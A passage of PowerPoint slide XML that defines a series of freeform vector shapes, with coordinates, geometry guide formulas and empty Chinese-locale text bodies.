                <a:gd name="T8" fmla="*/ 3 w 1023"/>
                <a:gd name="T9" fmla="*/ 0 h 182"/>
                <a:gd name="T10" fmla="*/ 4 w 1023"/>
                <a:gd name="T11" fmla="*/ 0 h 182"/>
                <a:gd name="T12" fmla="*/ 4 w 1023"/>
                <a:gd name="T13" fmla="*/ 0 h 182"/>
                <a:gd name="T14" fmla="*/ 4 w 1023"/>
                <a:gd name="T15" fmla="*/ 0 h 182"/>
                <a:gd name="T16" fmla="*/ 3 w 1023"/>
                <a:gd name="T17" fmla="*/ 1 h 182"/>
                <a:gd name="T18" fmla="*/ 3 w 1023"/>
                <a:gd name="T19" fmla="*/ 0 h 182"/>
                <a:gd name="T20" fmla="*/ 1 w 1023"/>
                <a:gd name="T21" fmla="*/ 1 h 182"/>
                <a:gd name="T22" fmla="*/ 0 w 1023"/>
                <a:gd name="T23" fmla="*/ 1 h 182"/>
                <a:gd name="T24" fmla="*/ 0 w 1023"/>
                <a:gd name="T25" fmla="*/ 1 h 182"/>
                <a:gd name="T26" fmla="*/ 0 w 1023"/>
                <a:gd name="T27" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1083" name="Freeform 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="872" y="3127"/>
              <a:ext cx="64" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 194"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 1 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 1 w 194"/>
                <a:gd name="T5" fmla="*/ 1 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 194"/>
                <a:gd name="T7" fmla="*/ 1 h 192"/>
                <a:gd name="T8" fmla="*/ 0 w 194"/>
                <a:gd name="T9" fmla="*/ 1 h 192"/>
                <a:gd name="T10" fmla="*/ 0 w 194"/>
                <a:gd name="T11" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1084" name="Freeform 57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1196" y="3120"/>
              <a:ext cx="63" cy="87"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 187"/>
                <a:gd name="T1" fmla="*/ 0 h 261"/>
                <a:gd name="T2" fmla="*/ 0 w 187"/>
                <a:gd name="T3" fmla="*/ 0 h 261"/>
                <a:gd name="T4" fmla="*/ 1 w 187"/>
                <a:gd name="T5" fmla="*/ 1 h 261"/>
                <a:gd name="T6" fmla="*/ 1 w 187"/>
                <a:gd name="T7" fmla="*/ 1 h 261"/>
                <a:gd name="T8" fmla="*/ 0 w 187"/>
                <a:gd name="T9" fmla="*/ 1 h 261"/>
                <a:gd name="T10" fmla="*/ 0 w 187"/>
                <a:gd name="T11" fmla="*/ 1 h 261"/>
                <a:gd name="T12" fmla="*/ 0 w 187"/>
                <a:gd name="T13" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1085" name="Freeform 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1029" y="3308"/>
              <a:ext cx="85" cy="40"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 257"/>
                <a:gd name="T1" fmla="*/ 0 h 120"/>
                <a:gd name="T2" fmla="*/ 0 w 257"/>
                <a:gd name="T3" fmla="*/ 0 h 120"/>
                <a:gd name="T4" fmla="*/ 0 w 257"/>
                <a:gd name="T5" fmla="*/ 0 h 120"/>
                <a:gd name="T6" fmla="*/ 1 w 257"/>
                <a:gd name="T7" fmla="*/ 0 h 120"/>
                <a:gd name="T8" fmla="*/ 1 w 257"/>
                <a:gd name="T9" fmla="*/ 0 h 120"/>
                <a:gd name="T10" fmla="*/ 1 w 257"/>
                <a:gd name="T11" fmla="*/ 0 h 120"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1086" name="Freeform 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="903" y="3256"/>
              <a:ext cx="93" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 277"/>
                <a:gd name="T1" fmla="*/ 1 h 162"/>
                <a:gd name="T2" fmla="*/ 0 w 277"/>
                <a:gd name="T3" fmla="*/ 0 h 162"/>
                <a:gd name="T4" fmla="*/ 1 w 277"/>
                <a:gd name="T5" fmla="*/ 0 h 162"/>
                <a:gd name="T6" fmla="*/ 1 w 277"/>
                <a:gd name="T7" fmla="*/ 0 h 162"/>
                <a:gd name="T8" fmla="*/ 1 w 277"/>
                <a:gd name="T9" fmla="*/ 0 h 162"/>
                <a:gd name="T10" fmla="*/ 1 w 277"/>
                <a:gd name="T11" fmla="*/ 0 h 162"/>
                <a:gd name="T12" fmla="*/ 0 w 277"/>
                <a:gd name="T13" fmla="*/ 1 h 162"/>
                <a:gd name="T14" fmla="*/ 0 w 277"/>
                <a:gd name="T15" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1087" name="Freeform 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1158" y="3270"/>
              <a:ext cx="99" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 298"/>
                <a:gd name="T1" fmla="*/ 0 h 147"/>
                <a:gd name="T2" fmla="*/ 1 w 298"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 298"/>
                <a:gd name="T5" fmla="*/ 0 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 298"/>
                <a:gd name="T7" fmla="*/ 1 h 147"/>
                <a:gd name="T8" fmla="*/ 1 w 298"/>
                <a:gd name="T9" fmla="*/ 1 h 147"/>
                <a:gd name="T10" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1088" name="Freeform 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="849" y="3189"/>
              <a:ext cx="112" cy="83"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 335"/>
                <a:gd name="T1" fmla="*/ 0 h 249"/>
                <a:gd name="T2" fmla="*/ 0 w 335"/>
                <a:gd name="T3" fmla="*/ 1 h 249"/>
                <a:gd name="T4" fmla="*/ 0 w 335"/>
                <a:gd name="T5" fmla="*/ 1 h 249"/>
                <a:gd name="T6" fmla="*/ 1 w 335"/>
                <a:gd name="T7" fmla="*/ 1 h 249"/>
                <a:gd name="T8" fmla="*/ 1 w 335"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1089" name="Freeform 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1141" y="3196"/>
              <a:ext cx="128" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 385"/>
                <a:gd name="T1" fmla="*/ 0 h 191"/>
                <a:gd name="T2" fmla="*/ 0 w 385"/>
                <a:gd name="T3" fmla="*/ 0 h 191"/>
                <a:gd name="T4" fmla="*/ 0 w 385"/>
                <a:gd name="T5" fmla="*/ 1 h 191"/>
                <a:gd name="T6" fmla="*/ 1 w 385"/>
                <a:gd name="T7" fmla="*/ 1 h 191"/>
                <a:gd name="T8" fmla="*/ 2 w 385"/>
                <a:gd name="T9" fmla="*/ 1 h 191"/>
                <a:gd name="T10" fmla="*/ 1 w 385"/>
                <a:gd name="T11" fmla="*/ 0 h 191"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1090" name="Freeform 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="854" y="3229"/>
              <a:ext cx="146" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 438"/>
                <a:gd name="T1" fmla="*/ 0 h 236"/>
                <a:gd name="T2" fmla="*/ 2 w 438"/>
                <a:gd name="T3" fmla="*/ 0 h 236"/>
                <a:gd name="T4" fmla="*/ 1 w 438"/>
                <a:gd name="T5" fmla="*/ 0 h 236"/>
                <a:gd name="T6" fmla="*/ 0 w 438"/>
                <a:gd name="T7" fmla="*/ 0 h 236"/>
                <a:gd name="T8" fmla="*/ 0 w 438"/>
                <a:gd name="T9" fmla="*/ 0 h 236"/>
                <a:gd name="T10" fmla="*/ 0 w 438"/>
                <a:gd name="T11" fmla="*/ 1 h 236"/>
                <a:gd name="T12" fmla="*/ 0 w 438"/>
                <a:gd name="T13" fmla="*/ 1 h 236"/>
                <a:gd name="T14" fmla="*/ 1 w 438"/>
                <a:gd name="T15" fmla="*/ 0 h 236"/>
                <a:gd name="T16" fmla="*/ 1 w 438"/>
                <a:gd name="T17" fmla="*/ 0 h 236"/>
                <a:gd name="T18" fmla="*/ 2 w 438"/>
                <a:gd name="T19" fmla="*/ 0 h 236"/>
                <a:gd name="T20" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1091" name="Freeform 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="774" y="3032"/>
              <a:ext cx="619" cy="562"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 1857"/>
                <a:gd name="T1" fmla="*/ 4 h 1687"/>
                <a:gd name="T2" fmla="*/ 6 w 1857"/>
                <a:gd name="T3" fmla="*/ 5 h 1687"/>
                <a:gd name="T4" fmla="*/ 6 w 1857"/>
                <a:gd name="T5" fmla="*/ 6 h 1687"/>
                <a:gd name="T6" fmla="*/ 6 w 1857"/>
                <a:gd name="T7" fmla="*/ 7 h 1687"/>
                <a:gd name="T8" fmla="*/ 5 w 1857"/>
                <a:gd name="T9" fmla="*/ 7 h 1687"/>
                <a:gd name="T10" fmla="*/ 5 w 1857"/>
                <a:gd name="T11" fmla="*/ 7 h 1687"/>
                <a:gd name="T12" fmla="*/ 2 w 1857"/>
                <a:gd name="T13" fmla="*/ 7 h 1687"/>
                <a:gd name="T14" fmla="*/ 1 w 1857"/>
                <a:gd name="T15" fmla="*/ 7 h 1687"/>
                <a:gd name="T16" fmla="*/ 1 w 1857"/>
                <a:gd name="T17" fmla="*/ 6 h 1687"/>
                <a:gd name="T18" fmla="*/ 0 w 1857"/>
                <a:gd name="T19" fmla="*/ 6 h 1687"/>
                <a:gd name="T20" fmla="*/ 0 w 1857"/>
                <a:gd name="T21" fmla="*/ 5 h 1687"/>
                <a:gd name="T22" fmla="*/ 0 w 1857"/>
                <a:gd name="T23" fmla="*/ 5 h 1687"/>
                <a:gd name="T24" fmla="*/ 0 w 1857"/>
                <a:gd name="T25" fmla="*/ 5 h 1687"/>
                <a:gd name="T26" fmla="*/ 0 w 1857"/>
                <a:gd name="T27" fmla="*/ 6 h 1687"/>
                <a:gd name="T28" fmla="*/ 1 w 1857"/>
                <a:gd name="T29" fmla="*/ 6 h 1687"/>
                <a:gd name="T30" fmla="*/ 1 w 1857"/>
                <a:gd name="T31" fmla="*/ 6 h 1687"/>
                <a:gd name="T32" fmla="*/ 2 w 1857"/>
                <a:gd name="T33" fmla="*/ 7 h 1687"/>
                <a:gd name="T34" fmla="*/ 3 w 1857"/>
                <a:gd name="T35" fmla="*/ 6 h 1687"/>
                <a:gd name="T36" fmla="*/ 5 w 1857"/>
                <a:gd name="T37" fmla="*/ 7 h 1687"/>
                <a:gd name="T38" fmla="*/ 5 w 1857"/>
                <a:gd name="T39" fmla="*/ 7 h 1687"/>
                <a:gd name="T40" fmla="*/ 6 w 1857"/>
                <a:gd name="T41" fmla="*/ 6 h 1687"/>
                <a:gd name="T42" fmla="*/ 6 w 1857"/>
                <a:gd name="T43" fmla="*/ 6 h 1687"/>
                <a:gd name="T44" fmla="*/ 6 w 1857"/>
                <a:gd name="T45" fmla="*/ 5 h 1687"/>
                <a:gd name="T46" fmla="*/ 6 w 1857"/>
                <a:gd name="T47" fmla="*/ 4 h 1687"/>
                <a:gd name="T48" fmla="*/ 7 w 1857"/>
                <a:gd name="T49" fmla="*/ 2 h 1687"/>
                <a:gd name="T50" fmla="*/ 7 w 1857"/>
                <a:gd name="T51" fmla="*/ 1 h 1687"/>
                <a:gd name="T52" fmla="*/ 7 w 1857"/>
                <a:gd name="T53" fmla="*/ 1 h 1687"/>
                <a:gd name="T54" fmla="*/ 7 w 1857"/>
                <a:gd name="T55" fmla="*/ 0 h 1687"/>
                <a:gd name="T56" fmla="*/ 6 w 1857"/>
                <a:gd name="T57" fmla="*/ 0 h 1687"/>
                <a:gd name="T58" fmla="*/ 6 w 1857"/>
                <a:gd name="T59" fmla="*/ 0 h 1687"/>
                <a:gd name="T60" fmla="*/ 7 w 1857"/>
                <a:gd name="T61" fmla="*/ 0 h 1687"/>
                <a:gd name="T62" fmla="*/ 7 w 1857"/>
                <a:gd name="T63" fmla="*/ 0 h 1687"/>
                <a:gd name="T64" fmla="*/ 8 w 1857"/>
                <a:gd name="T65" fmla="*/ 1 h 1687"/>
                <a:gd name="T66" fmla="*/ 7 w 1857"/>
                <a:gd name="T67" fmla="*/ 1 h 1687"/>
                <a:gd name="T68" fmla="*/ 7 w 1857"/>
                <a:gd name="T69" fmla="*/ 2 h 1687"/>
                <a:gd name="T70" fmla="*/ 7 w 1857"/>
                <a:gd name="T71" fmla="*/ 3 h 1687"/>
                <a:gd name="T72" fmla="*/ 7 w 1857"/>
                <a:gd name="T73" fmla="*/ 4 h 1687"/>
                <a:gd name="T74" fmla="*/ 7 w 1857"/>
                <a:gd name="T75" fmla="*/ 4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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1092" name="Freeform 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="756" y="3002"/>
              <a:ext cx="591" cy="398"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 1774"/>
                <a:gd name="T1" fmla="*/ 2 h 1195"/>
                <a:gd name="T2" fmla="*/ 7 w 1774"/>
                <a:gd name="T3" fmla="*/ 2 h 1195"/>
                <a:gd name="T4" fmla="*/ 7 w 1774"/>
                <a:gd name="T5" fmla="*/ 1 h 1195"/>
                <a:gd name="T6" fmla="*/ 6 w 1774"/>
                <a:gd name="T7" fmla="*/ 0 h 1195"/>
                <a:gd name="T8" fmla="*/ 6 w 1774"/>
                <a:gd name="T9" fmla="*/ 0 h 1195"/>
                <a:gd name="T10" fmla="*/ 5 w 1774"/>
                <a:gd name="T11" fmla="*/ 0 h 1195"/>
                <a:gd name="T12" fmla="*/ 3 w 1774"/>
                <a:gd name="T13" fmla="*/ 0 h 1195"/>
                <a:gd name="T14" fmla="*/ 1 w 1774"/>
                <a:gd name="T15" fmla="*/ 0 h 1195"/>
                <a:gd name="T16" fmla="*/ 1 w 1774"/>
                <a:gd name="T17" fmla="*/ 1 h 1195"/>
                <a:gd name="T18" fmla="*/ 0 w 1774"/>
                <a:gd name="T19" fmla="*/ 1 h 1195"/>
                <a:gd name="T20" fmla="*/ 0 w 1774"/>
                <a:gd name="T21" fmla="*/ 2 h 1195"/>
                <a:gd name="T22" fmla="*/ 0 w 1774"/>
                <a:gd name="T23" fmla="*/ 3 h 1195"/>
                <a:gd name="T24" fmla="*/ 0 w 1774"/>
                <a:gd name="T25" fmla="*/ 4 h 1195"/>
                <a:gd name="T26" fmla="*/ 0 w 1774"/>
                <a:gd name="T27" fmla="*/ 5 h 1195"/>
                <a:gd name="T28" fmla="*/ 0 w 1774"/>
                <a:gd name="T29" fmla="*/ 5 h 1195"/>
                <a:gd name="T30" fmla="*/ 0 w 1774"/>
                <a:gd name="T31" fmla="*/ 4 h 1195"/>
                <a:gd name="T32" fmla="*/ 0 w 1774"/>
                <a:gd name="T33" fmla="*/ 4 h 1195"/>
                <a:gd name="T34" fmla="*/ 0 w 1774"/>
                <a:gd name="T35" fmla="*/ 3 h 1195"/>
                <a:gd name="T36" fmla="*/ 0 w 1774"/>
                <a:gd name="T37" fmla="*/ 2 h 1195"/>
                <a:gd name="T38" fmla="*/ 0 w 1774"/>
                <a:gd name="T39" fmla="*/ 1 h 1195"/>
                <a:gd name="T40" fmla="*/ 1 w 1774"/>
                <a:gd name="T41" fmla="*/ 1 h 1195"/>
                <a:gd name="T42" fmla="*/ 2 w 1774"/>
                <a:gd name="T43" fmla="*/ 0 h 1195"/>
                <a:gd name="T44" fmla="*/ 3 w 1774"/>
                <a:gd name="T45" fmla="*/ 0 h 1195"/>
                <a:gd name="T46" fmla="*/ 5 w 1774"/>
                <a:gd name="T47" fmla="*/ 0 h 1195"/>
                <a:gd name="T48" fmla="*/ 6 w 1774"/>
                <a:gd name="T49" fmla="*/ 0 h 1195"/>
                <a:gd name="T50" fmla="*/ 6 w 1774"/>
                <a:gd name="T51" fmla="*/ 1 h 1195"/>
                <a:gd name="T52" fmla="*/ 7 w 1774"/>
                <a:gd name="T53" fmla="*/ 1 h 1195"/>
                <a:gd name="T54" fmla="*/ 7 w 1774"/>
                <a:gd name="T55" fmla="*/ 2 h 1195"/>
                <a:gd name="T56" fmla="*/ 7 w 1774"/>
                <a:gd name="T57" fmla="*/ 2 h 1195"/>
                <a:gd name="T58" fmla="*/ 7 w 1774"/>
                <a:gd name="T59" fmla="*/ 2 h 1195"/>
                <a:gd name="T60" fmla="*/ 7 w 1774"/>
                <a:gd name="T61" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1093" name="Freeform 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="743" y="3033"/>
              <a:ext cx="123" cy="147"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 369"/>
                <a:gd name="T1" fmla="*/ 0 h 441"/>
                <a:gd name="T2" fmla="*/ 1 w 369"/>
                <a:gd name="T3" fmla="*/ 0 h 441"/>
                <a:gd name="T4" fmla="*/ 0 w 369"/>
                <a:gd name="T5" fmla="*/ 0 h 441"/>
                <a:gd name="T6" fmla="*/ 0 w 369"/>
                <a:gd name="T7" fmla="*/ 1 h 441"/>
                <a:gd name="T8" fmla="*/ 0 w 369"/>
                <a:gd name="T9" fmla="*/ 2 h 441"/>
                <a:gd name="T10" fmla="*/ 0 w 369"/>
                <a:gd name="T11" fmla="*/ 1 h 441"/>
                <a:gd name="T12" fmla="*/ 0 w 369"/>
                <a:gd name="T13" fmla="*/ 1 h 441"/>
                <a:gd name="T14" fmla="*/ 1 w 369"/>
                <a:gd name="T15" fmla="*/ 0 h 441"/>
                <a:gd name="T16" fmla="*/ 1 w 369"/>
                <a:gd name="T17" fmla="*/ 0 h 441"/>
                <a:gd name="T18" fmla="*/ 2 w 369"/>
                <a:gd name="T19" fmla="*/ 0 h 441"/>
                <a:gd name="T20" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Freeform 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1026" y="3265"/>
              <a:ext cx="96" cy="48"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 289"/>
                <a:gd name="T1" fmla="*/ 1 h 144"/>
                <a:gd name="T2" fmla="*/ 1 w 289"/>
                <a:gd name="T3" fmla="*/ 0 h 144"/>
                <a:gd name="T4" fmla="*/ 1 w 289"/>
                <a:gd name="T5" fmla="*/ 0 h 144"/>
                <a:gd name="T6" fmla="*/ 1 w 289"/>
                <a:gd name="T7" fmla="*/ 0 h 144"/>
                <a:gd name="T8" fmla="*/ 1 w 289"/>
                <a:gd name="T9" fmla="*/ 0 h 144"/>
                <a:gd name="T10" fmla="*/ 0 w 289"/>
                <a:gd name="T11" fmla="*/ 0 h 144"/>
                <a:gd name="T12" fmla="*/ 0 w 289"/>
                <a:gd name="T13" fmla="*/ 1 h 144"/>
                <a:gd name="T14" fmla="*/ 0 w 289"/>
                <a:gd name="T15" fmla="*/ 0 h 144"/>
                <a:gd name="T16" fmla="*/ 1 w 289"/>
                <a:gd name="T17" fmla="*/ 0 h 144"/>
                <a:gd name="T18" fmla="*/ 1 w 289"/>
                <a:gd name="T19" fmla="*/ 0 h 144"/>
                <a:gd name="T20" fmla="*/ 1 w 289"/>
                <a:gd name="T21" fmla="*/ 1 h 144"/>
                <a:gd name="T22" fmla="*/ 1 w 289"/>
                <a:gd name="T23" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1095" name="Freeform 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="482" y="3713"/>
              <a:ext cx="1149" cy="245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 3447"/>
                <a:gd name="T1" fmla="*/ 0 h 735"/>
                <a:gd name="T2" fmla="*/ 4 w 3447"/>
                <a:gd name="T3" fmla="*/ 0 h 735"/>
                <a:gd name="T4" fmla="*/ 2 w 3447"/>
                <a:gd name="T5" fmla="*/ 0 h 735"/>
                <a:gd name="T6" fmla="*/ 0 w 3447"/>
                <a:gd name="T7" fmla="*/ 1 h 735"/>
                <a:gd name="T8" fmla="*/ 0 w 3447"/>
                <a:gd name="T9" fmla="*/ 2 h 735"/>
                <a:gd name="T10" fmla="*/ 0 w 3447"/>
                <a:gd name="T11" fmla="*/ 2 h 735"/>
                <a:gd name="T12" fmla="*/ 0 w 3447"/>
                <a:gd name="T13" fmla="*/ 2 h 735"/>
                <a:gd name="T14" fmla="*/ 1 w 3447"/>
                <a:gd name="T15" fmla="*/ 2 h 735"/>
                <a:gd name="T16" fmla="*/ 7 w 3447"/>
                <a:gd name="T17" fmla="*/ 3 h 735"/>
                <a:gd name="T18" fmla="*/ 12 w 3447"/>
                <a:gd name="T19" fmla="*/ 3 h 735"/>
                <a:gd name="T20" fmla="*/ 13 w 3447"/>
                <a:gd name="T21" fmla="*/ 3 h 735"/>
                <a:gd name="T22" fmla="*/ 14 w 3447"/>
                <a:gd name="T23" fmla="*/ 2 h 735"/>
                <a:gd name="T24" fmla="*/ 14 w 3447"/>
                <a:gd name="T25" fmla="*/ 2 h 735"/>
                <a:gd name="T26" fmla="*/ 14 w 3447"/>
                <a:gd name="T27" fmla="*/ 1 h 735"/>
                <a:gd name="T28" fmla="*/ 13 w 3447"/>
                <a:gd name="T29" fmla="*/ 1 h 735"/>
                <a:gd name="T30" fmla="*/ 11 w 3447"/>
                <a:gd name="T31" fmla="*/ 0 h 735"/>
                <a:gd name="T32" fmla="*/ 13 w 3447"/>
                <a:gd name="T33" fmla="*/ 1 h 735"/>
                <a:gd name="T34" fmla="*/ 13 w 3447"/>
                <a:gd name="T35" fmla="*/ 2 h 735"/>
                <a:gd name="T36" fmla="*/ 13 w 3447"/>
                <a:gd name="T37" fmla="*/ 2 h 735"/>
                <a:gd name="T38" fmla="*/ 13 w 3447"/>
                <a:gd name="T39" fmla="*/ 3 h 735"/>
                <a:gd name="T40" fmla="*/ 7 w 3447"/>
                <a:gd name="T41" fmla="*/ 2 h 735"/>
                <a:gd name="T42" fmla="*/ 1 w 3447"/>
                <a:gd name="T43" fmla="*/ 2 h 735"/>
                <a:gd name="T44" fmla="*/ 0 w 3447"/>
                <a:gd name="T45" fmla="*/ 2 h 735"/>
                <a:gd name="T46" fmla="*/ 0 w 3447"/>
                <a:gd name="T47" fmla="*/ 2 h 735"/>
                <a:gd name="T48" fmla="*/ 2 w 3447"/>
                <a:gd name="T49" fmla="*/ 0 h 735"/>
                <a:gd name="T50" fmla="*/ 4 w 3447"/>
                <a:gd name="T51" fmla="*/ 0 h 735"/>
                <a:gd name="T52" fmla="*/ 4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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Freeform 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="645" y="2936"/>
              <a:ext cx="857" cy="599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 2571"/>
                <a:gd name="T1" fmla="*/ 5 h 1796"/>
                <a:gd name="T2" fmla="*/ 0 w 2571"/>
                <a:gd name="T3" fmla="*/ 1 h 1796"/>
                <a:gd name="T4" fmla="*/ 0 w 2571"/>
